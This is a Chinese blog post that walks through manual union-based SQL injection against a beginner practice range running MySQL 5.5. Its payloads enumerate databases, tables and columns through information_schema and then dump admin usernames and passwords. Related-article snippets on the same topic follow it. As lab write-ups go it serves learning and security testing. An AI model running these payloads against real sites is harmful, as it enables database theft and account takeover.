SQL注入 MySql5以上常规注入笔记

最新推荐文章于 2022-06-15 09:58:06 发布
最新推荐文章于 2022-06-15 09:58:06 发布
阅读量249 收藏
点赞数
分类专栏: SQL注入 WEB安全 文章标签: mysql sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43191108/article/details/113359666
版权

 以一个基础入门靶场为例,记录一下简单的一阶SQL手注操作以及针对MYSQL5以上版本的数据库信息语句构造。

0x01 注入点

因为这是一个简单的入门手注靶场,就不做过多详述。

一般的,先针对目标URL,观察下是数字型还是字符型注入。

http://59.63.200.79:8003/?id=1

很容易发现,这应该是一个数字型注入点。

构造payload,观察页面回显是否正常。

?id=1 and 1=2

在这里插入图片描述

发现的确符合预期的false逻辑执行,页面并没有能够正常回显。

0x02 判断字段数

构造payload

?id=1 order by 1

?id=1 order by 2

?id=1 order by 3

在这里插入图片描述

此时页面回显异常,说明当前表中有2个字段,即两列数据。进一步我们考虑利用union联合查询合并查询结果,替换成我们想要的信息,再次之前需要确认一下回显点。

构造payload

?id=1 and 1=2 union select 1,2#

因为这里union联合查询会合并两句select语句结果,我们需要让第一句查询逻辑出错。

在这里插入图片描述

通过图片可以确定回显点。

0x03 收集信息

这边我们仅关注当前数据库信息。

构造payload

?id=1 and 1=2 union select 1,version()#

在这里插入图片描述

可以看到是Mysql的5.5.53版本。

0X04 查询相关信息

在5以上的MySQL有一个名为information_schema的内置库。 这是保存有关DB服务器中存在的表和列的信息。 也就是说,它包含站点的所有表和列的名称。

因此我们可以分别构造payload如下来暴库、猜表、猜字段等

# 爆库
select 1,2,3,...,SCHEMA_NAME from information_schema.SCHEMATA	
# 猜表
select 1,2,3,...,TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA='目标库名'
# 猜字段	
select 1,2,3,...,COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME='目标表名'

在此基础上,我们根据测试出的注入点、字段数、回显位置构造URL。

爆库

?id=1 and 1=2 union select 1,SCHEMA_NAME from information_schema.SCHEMATA limit 0,1

在这里插入图片描述

因为这里只能显示一处信息,逐次改变limit位置显然很麻烦。

我们可以采用字符串拼接的方法,一次性爆出。

构造payload

?id=1 and 1=2 union select 1,group_concat(schema_name) from information_schema.SCHEMATA#

在这里插入图片描述

爆表

我们分别爆出maoshe、test两个库中的数据表。

构造payload

select 1,group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA='maoshe'

在这里插入图片描述

可以看见maoshe库中有admin、dirs、news和xss四张表。

继续构造payload

select 1,group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA='test'

在这里插入图片描述

这是一个空库。

爆字段

  • admin表

    构造payload

    ?id=1 and 1=2 union select 1,GROUP_CONCAT(COLUMN_NAME) from information_schema.COLUMNS where TABLE_NAME='admin' limit 0,1#

在这里插入图片描述

  • dirs表

    构造payload

    ?id=1 and 1=2 union select 1,GROUP_CONCAT(COLUMN_NAME) from information_schema.COLUMNS where TABLE_NAME='dirs' limit 0,1#

在这里插入图片描述

  • news表

    构造payload

    ?id=1 and 1=2 union select 1,GROUP_CONCAT(COLUMN_NAME) from information_schema.COLUMNS where TABLE_NAME='news' limit 0,1#

在这里插入图片描述

  • xss表

    ?id=1 and 1=2 union select 1,GROUP_CONCAT(COLUMN_NAME) from information_schema.COLUMNS where TABLE_NAME='xss' limit 0,1#

在这里插入图片描述

爆密码

比如针对admin表

构造payload

?id=1 and 1=2 union select 1,concat(username,'|',password) from admin limit 0,1#

一次性爆出所有信息,可以这样构造

?id=1 and 1=2 union select 1,group_concat(concat(username,'|',password)) from admin #

在这里插入图片描述

将username和password信息拼接在一起。

一次性爆出所有信息,可以这样构造

?id=1 and 1=2 union select 1,group_concat(concat(username,'|',password)) from admin #

在这里插入图片描述

当然这样还是有些麻烦,我们可以考虑编写一个自动化脚本来提交payload,爬取回显信息来完成自动化注入。

Lkiopy
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PHP+MysqlSQL注入源码 下载
04-25
【PHP+MySQLSQL注入】 在互联网开发中,PHP与MySQL是常见的组合,用于构建动态网站和应用程序。PHP是一种服务器端脚本语言,主要用于Web开发,可以与多种数据库系统配合,其中MySQL是最常用的一种开源关系型...
mysql 暴库 group_concat(),mysql 5注入中group_concat的使用
weixin_32645721的博客
03-17 149
Beats By Dr Dre Studio Pittsburgh Steelers HighDefinition UK:Beats By Dr.Dre Studio Colorful Champagne Limited Edition UK,Beats By Dr.Dre Studio Colorware Chrome Limited Edition UK,Beats By Dr.Dre Stu...
完成dvwas中sql注入模块的练习
S_cx666的博客
12-22 992
完成dvwas中sql注入模块的练习
mysql5.x sql注入_SQL注入漏洞
weixin_33101399的博客
02-07 338
2-1 SQL注入原理1)语言分类:解释型语言和编译型语言。解释型语言是一种在运行时由一个运行时组件解释语言代码并执行其中包含的指令的语言。而编译型语言是代码在生成时转换为机器指令,然后再运行时直接由使用该语言的计算机执行这些指令。在解释型语言中,如果程序与用户进行交互。用户就可以构造特殊的输入来拼接到程序中执行,从而使得程序依据用户输入执行有可能存在恶意行为的代码。例如:在与用户交互的程序中,用...
sql注入(4)mysql注入
c10udz的博客
04-13 4703
1.MySQL5.x结构框架 在MySQL 5.0以上版本中,为了方便管理,默认定义了information_schema数据 库,用来存储数据库元信息,其中经常用到的表有:schemata(记录数据库名),tables(记录表名),columns(列名或字段名) 在schemata表中,schema_name(记录数据库名) 在tables表中,table_schema(记录存储的数据库名),table_name(表名)(schema_name和table_name都记录了MySQL中所有的数据库名
MySQL5.0及以上和5.0以下有什么区别】
qq_55213436的博客
06-15 4704
最近也是在一直在牛牛上看各个公司的以往校园招聘的笔试和面试题目,发现这样一道有意思的问题:mysql5.0和5.0以下的版本有什么区别?我发现这个问题看是简单,但是里面包含的门道却是很多。 ......
MySQL解决SQL注入的另类方法详解
09-10
MySQL中,防止SQL注入有多种方法,包括使用预编译语句、参数化查询、转义特殊字符等。本文主要探讨一些非传统的、另类的方法来解决SQL注入问题。 首先,我们来看问题的本质。当用户输入被直接插入到SQL语句中时,...
sql注入讲解ppt.pptx
08-10
SQL 注入基础知识点总结 SQL 注入是指 web 应用程序对用户...通过学习 SQL 注入基础知识、工具和环境搭建、MySQL 数据库基础知识、SQL 注入防御、SQL 注入类型和基本步骤,我们可以更好地理解和防御 SQL 注入攻击。
MySQLSQL 注入
12-16
MySQLSQL 注入 如果您通过网页获取用户输入的数据并将其插入一个MySQL数据库,那么就有可能发生SQL注入安全的问题。 本章节将为大家介绍如何防止SQL注入,并通过脚本来过滤SQL注入的字符。 所谓SQL注入,就是...
MySQL注入攻击与防御
3569
10-24 4036
本文主要是做一个Mysql注入总结,对于Mysql来说利用的方式太过于灵活,这里总结了一些主流的一些姿势,如果有好的姿势可以多加交流,文章如果有错也欢迎各位dalao指出:) [TOC] 注入常用函数与字符 下面几点是注入中经常会用到的语句 控制语句操作(select, case, if(), …) 比较操作(=, like, mod(), …) 字符串的猜解操作
mysql5无法注入_MySQL解决SQL注入的另类方法详解_MySQL
weixin_35355560的博客
02-18 183
本文实例讲述了MySQL解决SQL注入的另类方法。分享给大家供大家参考,具体如下:问题解读我觉得,这个问题每年带来的成本可以高达数十亿美元了。本文就来谈谈,假定我们有如下 SQL 模板语句:select * from T where f1 = '{value1}' and f2 = {value2}现在我们需要根据用户输入值填充该语句:value1=hellovalue2=5我们得到了下面的 SQ...
SQL注入实战-MySQL
热门推荐
mozhe_的博客
04-15 1万+
靶场地址:https://mozhe.cn/bug/detail/MFZ4VjBxRnlIMHBUdGllRDJBMWtRZz09bW96aGUmozhe进入靶场详情页,点击启动靶场,根据系统提供的信息进入靶场环境。Php注入mysql查询语句,由地址中的“?id=MQo=”可以看出,此处传递时用了base64编码,base64解码“id=MQo=”为1,常用mysql注入语句:这里仅列出常用的信...
SQL Server 2008,MySQL 5.1和Oracle 11g的sql注入详解
这里记录着我一点一滴的进步
01-15 812
SQL 注入原理 SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。 SQL 注入分类 1. 数字型注入 当输入的参数为整型时,则有可能存在数字型注入漏洞。 假设存在一条 URL 为:HTTP://www.aaa.com/t...
封神台靶场-第一章:为了女神小芳!【SQL注入攻击原理】
红凳子的博客
05-07 2010
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 封神台靶场-第一章:为了女神小芳!【SQL注入攻击原理】前言判断是否存在SQL注入漏洞二、使用步骤1.引入库2.读入数据总结 前言 提示:通过sql注入拿到管理员密码! 尤里正在追女神小芳,在得知小芳开了一家公司后,尤里通过whois查询发现了小芳公司网站,学过一点黑客技术的他,想在女神面前炫炫技。于是他打开了传送门 判断是否存在SQL注入漏洞 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二
SQL注入之POST型常规注入
Jim的博客
08-14 1万+
less11单引号字符型注入 注入:test' or 1=1 #&password=test sql语句:select username, password from users where username='test' or 1=1 #' and password='test' limit 0,1; 注入:uname=test&passwd=test' or '1'='1 sql语句:
sql注入获取mysql版本信息_这可能是最全的SQL注入总结,很有用
weixin_28936857的博客
02-22 2384
SQL注入原理当客户端提交的数据未作处理或转义直接带入数据库,就造成了sql注入。攻击者通过构造不同的sql语句来实现对数据库的任意操作。SQL注入的分类按变量类型分:数字型和字符型按HTTP提交方式分:POST注入、GET注入和Cookie注入注入方式分:布尔注入、联合注入、多语句注入、报错注入、延时注入、内联注入按数据库类型分:sql:oracle、MySQL、mssql、access、sq...
4.0.13 mysql 注入_SQL注入MYSQL
weixin_39828859的博客
01-26 139
SQL注入MYSQL总体上先判断是否有注入点(数字型还是字符型)⽅法⼀:单引号法 '⽅法⼆:逻辑法 and 1=1 and 1=2 1' and '1'='1 1' and '1'='2⽅法三:运算法 -1联合查询条件:前提是前后查询必须拥有相同数量的列,列也必需拥有相同的数据类型版本>4.0当MySQL版本⼤于 5.0时,有个默认数据库information_schema获取当前...
SQL手工注入常规用法
OKAY_TC的博客
03-07 461
Mysql5.0版本后 information_schema union select 1,database() //查看数据库 union select 1,group_concat(table_name) from information_schema.tables where table_schema='xx' //查看xx数据库中表名 union select ...
1、SQL注入语句之Mysql(5)Union
daxi0ng的博客
08-15 575
waf拦截了information_schema,columns,tablesm,database,schema等关键字或函数 select * from test where id =1 union select (select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union selec...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值